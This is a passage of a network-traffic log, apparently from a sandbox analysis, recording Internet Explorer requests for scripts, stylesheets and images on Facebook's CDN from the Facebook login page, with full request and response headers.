                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: /KN4BNtqrVgo5QvJPmYKrg==
                                                  X-FB-Debug: CZgQZDybPZMG6SNLIxqbFTQS9SMnxMjz0/TMT1R/6+3NWoCnK3NDNOI1ZoGHbgfg6ETklUjwMBXHjjLUdVMRuw==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 2227
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 27 Sep 2024 02:07:22 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: PCil07El4hl7RdWxcVlVHw==
                                                  X-FB-Debug: 6mCb5ksE4SWY6ep/dBvt3HDcZMThH0nxucS18D9SjyazJJieB0fRt/z9fHQFj84BwZyluLHa/UAIsSNtM7RAfA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 333
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/X98p6omdveu.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yb/r/X98p6omdveu.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 18:35:02 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: pMcL/f4B6KDe08MYVaiwtQ==
                                                  X-FB-Debug: g3FxdKgl+EIqLZIl9Vlz4oU11SZ96mI+DWcojALRHipSeM+iAcWJdkyVScqINpGpVcEtc5z5yuGnekvRShuQ0Q==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 13203
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/Szq51TCr-iX.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y2/r/Szq51TCr-iX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 27 Sep 2024 17:31:41 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: t2HbM6EoMk3FCrni3vrO0g==
                                                  X-FB-Debug: QOyy6wBVEKZBi9eazIEkGfO6z5S7SHf6i8zs8uA0Gt+3AQKzV9FiNmyXtl7agutG9AfdcRoYAC6WsSaNFtKadA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 2833
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/FQIPxzEyFvX.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yn/r/FQIPxzEyFvX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 05 Oct 2024 20:54:26 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: UpNiWlffqjlIuf1nAZhhqw==
                                                  X-FB-Debug: kJnMDXn9Aa4BAHrvq8KztDF9zFTh97CoP0mHYGSt1/x35gJ5OMvoEfhJ8gp9eMy2OiMWbg1Y+e934U9h65R7MQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 9798
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/xx_kouuGNk2.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y6/l/0,cross/xx_kouuGNk2.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 20:56:42 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: VQtB9pAx/N+AtfzQphsojg==
                                                  X-FB-Debug: umD2t/gQQBw/y2nLPbbtVDLIAvB/bLSM4CPVRbzYtK22q5SyiKh5It37Ln4iK48Na8iWFdHwYb417xF2v9e9Ug==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 771
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/DB8Huzq8P9n.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y5/l/0,cross/DB8Huzq8P9n.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Mon, 23 Sep 2024 17:31:41 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: VBK/57AI15Iv5vQPoOVuPw==
                                                  X-FB-Debug: 79kVufQIrfxDjr8RRsroZBjmeHrD3WP4ExYxzVnsEmFTFrpCZYSLsXo6yoFKYWGVnkSC+L+tDaQ9zSdd48xmRA==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 974
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/jszcM5LFidI.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yH/l/0,cross/jszcM5LFidI.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 19:24:32 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: vDvuPB8tDbdhAj8xpcl6PA==
                                                  X-FB-Debug: kZKNBMn+McX+mTMwBZ24oGJFXd+QQfwoOk3B3BYLuSHxQebb7tRLH/eMmfNVEXrRjLUSvVuR2WZKTmS/+OjFFg==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 4029
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  content-md5: OcEdZWIg79UvSWVADRSQCg==
                                                  Expires: Sat, 28 Sep 2024 22:45:29 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  X-FB-Debug: gOe8Di1sgiMxsAGjUnLLNbXNLnmZ2707UMC0IpXYaEwgLvcL71m00uOJZfnT6CM9bmMp21cDUPPl93biY73qqQ==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 95
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Thu, 03 Oct 2024 19:51:44 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: ivkhXUQG4wQzNqI4NjhapA==
                                                  X-FB-Debug: OqWVCr+jpISO5hEageqfiA9SSq4+KdbiYmUZrbO9ZpCcffQ4bpRWGXmVmd+bS1vTfUdgELHaU3i2+VSENxmqGQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 302
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 02:27:45 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: mbSOjwZV3q/6hOr28/4qRA==
                                                  X-FB-Debug: M/p/8meR6054oPdiIR3DFRhXaGLlLNPevPuiINenvbNYIrIa62n3kkSzAFv4P82rKPTBLn1/sUopzjg28WPxIg==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 6030
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/6XlDJXhMTmo.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yr/r/6XlDJXhMTmo.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 17:47:40 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: QMAAX4j23G1VFnfuuNeJhQ==
                                                  X-FB-Debug: cSl828esKY67oe6dpKkBdZ+Aj5SUgFVrTdUdpA1F8e0MD75+7ml39Sp1K2BOoC1Bs4ais9G8wLp0P0yIXVc7iA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 2090
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/1Wa4Bq8ekru.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y0/r/1Wa4Bq8ekru.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Thu, 03 Oct 2024 21:27:41 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  x-fb-optimizer: 0
                                                  content-md5: h5Gyp0PGvH/9ItylSdqNyw==
                                                  X-FB-Debug: TxWYubwcUjPu1I4FJ31ogYcZ8h3qMT0ziD/cA6e39Buv1s3IdiWymAImME06Br9gHspAIMgX5LAGNfBi+7EzDg==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 12520
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 02:29:52 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: 8+8w3OlaRgQuE5P3aQtiSA==
                                                  X-FB-Debug: zF7HE7/SZs2NU5mSFL5aKVuwk9RBnP7ZXsFJLMY9OCUhUezSFR8FsRAdvysaVPVMgKjo+5VnAaW+E2Ck91mxjQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 7959
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/Vgv8SHTD4rI.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yf/l/0,cross/Vgv8SHTD4rI.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 19:24:30 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: zO61X6u+yg4JGmTlYuQ5Fw==
                                                  X-FB-Debug: me8lDMhTFYe8pcenQFQi6yvV+lmg2dtIAk4UHB19FvYeRHGHD5F6Gy0ZsXuL3DkuNg4qMYVgT37vvl2sacnl3A==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 8196
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/yI/r/4aAhOWlwaXf.svg
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/yI/r/4aAhOWlwaXf.svg HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: image/svg+xml
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sun, 06 Oct 2024 02:15:50 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: 7LTAFoD2FIsnNV1/7L5XgQ==
                                                  X-FB-Debug: SBhx3r3vs9PmQpRMl+a/+iE8hhyN6NJDQPxYh8qKHmMzGEs6M1bmJ+Gn89brebskHH/q8TEUreQhRSB4uLB2nA==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 986
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yn/l/en_US/WW_dM8tCcty.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3i7M54/yn/l/en_US/WW_dM8tCcty.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
